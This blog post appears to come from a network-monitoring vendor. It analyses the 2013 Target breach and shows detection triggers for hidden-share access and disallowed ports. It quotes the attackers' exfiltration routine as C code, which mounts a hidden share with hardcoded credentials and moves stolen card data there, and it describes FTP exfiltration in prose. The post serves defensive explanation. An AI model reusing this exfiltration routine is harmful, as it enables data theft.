Advanced Persistent Surveillance with Wire Data (Target Breach Analysis and how wire data could have detected it)

2013 marked some of the most public breaches in recent history, a large portion of them involving Credit Card numbers and cardholder information being compromised. The year seemed to end with a bang as Target was the subject of a rather devastating breach of cardholder data that resulted from a “sophisticated” attack that involved several steps post breach that included setting up exfiltration, propagating malware and mounting CIFS String shares. This new breed of attack drives home some of the deficiencies in traditional INFOSEC strategies. Relying solely on algorithm based security has its limits as hackers learn to code within the blind spots. In the wake of the Target breach Eddie Schwartz, VP of Global Security Solutions at Verizon, stated “Once an attacker gets in, lateral movement is really difficult to detect because most organizations are perimeter-focused”. Citation

Mr. Schwartz’ statement drives home one of my frustrations with SecOps over the last ten years. While we do a lot to block packets from getting in, those that do get in seem to roam throughout the network, unmolested. Then there is simple, good old fashion insider theft. The ability to monitor lateral communications though digital surveillance I believe will be key in detecting and potentially stopping tomorrow’s 17 year old Russian hacker. While Target has become the whipping boy for the public due to one of the more publicized breaches, the fact is, Target is hardly the first to endure such an embarrassing compromise. Google, Lockheed Martin and even RSA have experienced security incidents as a result of well-planned attacks. You cannot tell me that they don’t have superior engineers working at Google, Lockheed and RSA? If you think you cannot get hacked or that you have NO disgruntled employees, think again. Digital surveillance positions you to be able to integrate wire data analytics into your existing SecOps strategy providing an alternative to alerts. In my opinion false positives are the downfall of a number of monitoring strategies not just Security tools.

In this post I want to talk about ExtraHop and how it can provide scalable, wire-speed surveillance of your infrastructure and deliver operational intelligence to your incumbent SecOps teams as well as provide detailed reports to individual application owners.

Surveillance vs. Alerting
If your SecOps team is dealing with thousands of alerts each day you run the risk of them becoming desensitized to them. While I agree alerts are very important I want to augment them with a surveillance strategy that includes sending daily, weekly and even monthly reports on specific activity. Also, I think that to fight against tomorrow’s more sophisticated attacks, we should start to re-introduce application hosting teams to the INFOSEC practice. Example: A SecOps engineer, who was not involved in the setup and design of a specific CRM application, may not see certain traffic as a potential breach. Let’s say a laptop in the mail room connects to your back end SQL Server hosting critical customer information or leads. They may have SQL Studio installed and could be coming in over port tcp/1433 with an approved set of credentials and may not trigger any alarms. Give this report to the SecOps person (who has 100s of other things going on at the same time) and it may look just fine. Hand this report to the App owner and they are likely going to fall out of their chair. The point is, we need the combination of surveillance and alerting to ensure that more sophisticated attacks are noticed before all of the pieces are in place. Along with this, we need to enlist application owners in a manner that does not turn them into a Security practitioner but gives them a quick report that they can glance over.

ExtraHop Wire Data Analytics Platform
Like the heading says, ExtraHop is a Wire Data Analytics platform. For most of you in INFOSEC, you have worked with wire data in the past with an IDS or IPS. Like an IDS/IPS we work with a network span but instead of searching for specific signatures, we have the ability to parse Layer 2-7 and reassemble the flows. This provides a myriad of benefits that include:

  • Application performance of specific Layer 7 application protocols
  • Layer 4 metrics in terms of turn timing of conversations between client, server including the port (what many more expensive tools do now is “guess” at the protocol by looking at the port)
  • Real-time Operational Intelligence, including digital surveillance of critical systems

At ExtraHop, while we do not market ourselves as an Information Security company, we do believe that integrating wire data analytics into your existing SecOps regimen will provide much of the visibility lacking in several of the last year’s compromises. The ExtraHop platform passively observes a spanned port (think of it as a digital version of a CCTV). Because of this, we are uniquely positioned to deliver digital surveillance of your critical systems at today’s high volume wire speeds (up to a sustained 20Gbps). In this post, I would like to cover how wire data analytics, when integrated with an existing SecOps regimen can help you product against zero-day attacks and provide the digital surveillance to go beyond regulatory box ticking and get down to the business of securing your critical assets, your data.

Analyzing the Target Breach and How ExtraHop Could Have Helped
In reviewing the data on the target breach as reported by krebsonsecurity.com (“Inside a Targeted Point of Sale Data Breach”) we want to provide examples of what steps we could have taken using ExtraHop’s wire data platform to provide digital surveillance that could have potentially mitigated the breach. For the record, Target was warned by FireEye and my intent here is not to indict anyone, I find FireEye to be a fantastic innovation and, in fact, see a lot of synergy between them and us.

Part 1:
Exfiltration Staging Detection
On page 4 of the PDF provided by kerbsonsecurity.com we note that data was moved to an attacker-designated internal server to collect information stolen from the individual POS terminals. The specific exfiltration script below shows the cmd/bat file they used.

char *     Exfiltrate() {
char buf[2048];
char buf3[24];
SYSTEMTIME SystemTime;
GetWindowsDirectory(buf, 2048);
strcat(buf, “\\system32\\winxml.dll”);
/* Retrieve name of this system */
szComputerName = _GetComputerName();
GetLocalTime(&SystemTime);
/* Decode hardcoded command string */
_StringUnscramble();
system(“net use S: \\10.116.240.31\c$\WINDOWS\twain_32 “

“/user:ttcopscli3acs\Best1_user BackupU$r”);
/* Decode hardcoded sprintf format string */
_StringUnscramble2();
sprintf(buf2, “move %s S:\\%s_%d_%d_%d.txt”,

buf, szComputerName, SystemTime.wDay, SystemTime.wMonth,
SystemTime.wHour);
EnterCriticalSection(&critSect);
system(buf);
LeaveCriticalSection(&critSect);
/* Remove mount point after file copy */
system(“net use S: /del”);
return sprintf(buf3, “%d”, SystemTime.wHour);
}

Below is a simple ExtraHop Trigger to warn you of when a user connects to a hidden share.
// Increment Counter on Hidden Share Access //

var client_ip = Flow.client.ipaddr;
var CIFSString = share + ” ## ” + client_ip ;
if(CIFS.share !== null) {
if(CIFS.share.indexOf(‘IPC$’) == -1){
if(CIFS.share.indexOf(‘$’) > -1) {
debug(CIFS.share);
Network.metricAddCount(“cifs_hidden_share_count”,1);
Network.metricAddDetailCount(“cifs_hidden_share_detail”,CIFSString,1);
}
}
}

Basically, the trigger ignores the commonly access “IPC$” share and increments the counter each time a hidden share is accessed. This counter can then be written an application or network container on the ExtraHop dashboard or we can syslog the event to Splunk, ArcSight, RSA Envision, etc.

Breach attempt Walk Through:
Let’s do a walk throuth of how this would look when Digital Surveillance is used with ExtraHop’s wire data analytics platform.

In my lab setup I have a custom dashboard set up to warn me when someone accesses a hidden CIFS Share. (See CIFS Hidden Share Access: 30)

When you click on the link you will are given a count of how many times the specific share as well as file was accessed/copied and by which system. Note below we see that the host 192.168.1.99 copied the file “DecryptedCreditCardNumbers.txt” to the hidden share of our supposed Exfiltration box. (BUSTED!!)

It is important to note that while we did all of this within the ExtraHop console, we could have just as easily sent this information to the incumbent SecOps SIEMS system. I would also like to append to the existing SecOps regimen surveillance metrics in the form of periodic emails to the app/system owners allowing them to participate in the security practice. This could be in the form of a few emails that they open up, read and (hopefully) archive. At the most five minutes out of their day to look over a report and escalate if they see something that doesn’t add up. The CIFS event offers additional metrics that can be reported on including (but not limited to) the UserID, Request and Response Bytes.

Below is a daily email example(I haven’t set up a hidden shares surveillance report yet) that I get and archive every morning. This specific email is for Port violations (any communications outside of trusted hosts) of our pretend Credit Card Database.

As you can see, using digital surveillance with wire data can cover some of the blind spots that exist within lateral communications. If you use a service such as FireEye, this will be great information for them to collect and quickly tell you that you have an issue vs. Parsing through potentially gigabytes of indexed data.

Part 2:

Exfiltration from the Staging server to the external server outside your organization
So if we continue with our sample walk-thru of the Target breach we get to second example where the credit card numbers are actually exfiltrated out of the internal network and onto servers in Russia. The example on Page 6 of the Krebsonsecurity pdf shows the staging server typing an ftp –c command citing a text file with a script that opened an FTP Session, navigated to a Public_html folder then copying the stolen data.

How ExtraHop can spot and report on exfiltration over FTP:

The first thing we do our immaginary Card Holder Environment is write a trigger white listing which ports and protocols are allowed to talk to which hosts. We do this with the script below:

 

ExtraHop’s triggers are able to tap into the wire and extract critical metrics and statistics from ongoing transactions and make it available to the Console, SIEMs system or an emailed report. The trigger on the left basically states that if there is a connection with a sever that is NOT a Domain Controller and is NOT with a trusted host and NOT over an approved port, increment the counters. This particular trigger is tied to our fictitious Database server(Sorry for the Blurriness, the arrow is pointing to a custom metric called “SQL Server Disallowed Ports“)

When you click on the SQL Server Disallowed Ports metric you note that someone used FTP to send something FROM the back end database. (I had to RDP to do it so you also see my RDP session on 3389 as well)

If we drill into the SQL Server we note that it was, in fact, an FTP Client

And when we click on “Files” we can see that a (actual) txt file was sent from our imaginary exfiltration server (BUSTED!)

Conclusion:
We have only scratched the surface of all the capabilities we have with wire data analytics when integrated into your SecOps practice. We can fully integrate into an existing SIEMS environment or if you are using the FireEye TAP service, we can send pre-parsed and normalized data to them making their analysis even better. ExtraHop has additional protocol fluencies in several Layer 7 protocols that include HTTP, SSL, DB (SQL, Oracle,MySQL,Postgres,DB2),NFS,SMTP,ICA,HL7, etc. ExtraHop also has an option to enable a precision packet capture which can provide a pcap file based on specific events giving you the ability to have digital evidence of malicious behavior. Digital surveillance positions SecOps to not only note the behavior of malware and malicious code but can also provide surveillance against insider threats or internal bad actors. Malware is a moving target, it is difficult, if not impossible, to expect vendors to be able to detect tomorrow’s signatures. Wire data analytics allows us to watch for packet-level behavior outside of the expected pattern. While alerts focus on an immediate threat at hand, more sophisticated attacks that involve multiple steps and hours, even days to set up, require a more detailed surveillance strategy that is also persistent. We believe that integrating ExtraHop’s wire data analytics platform into your existing security operations provides an easy path to getting app owners involved and help prevent your organization from being in the news.

Thanks for reading

John M Smith

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

Leave a Reply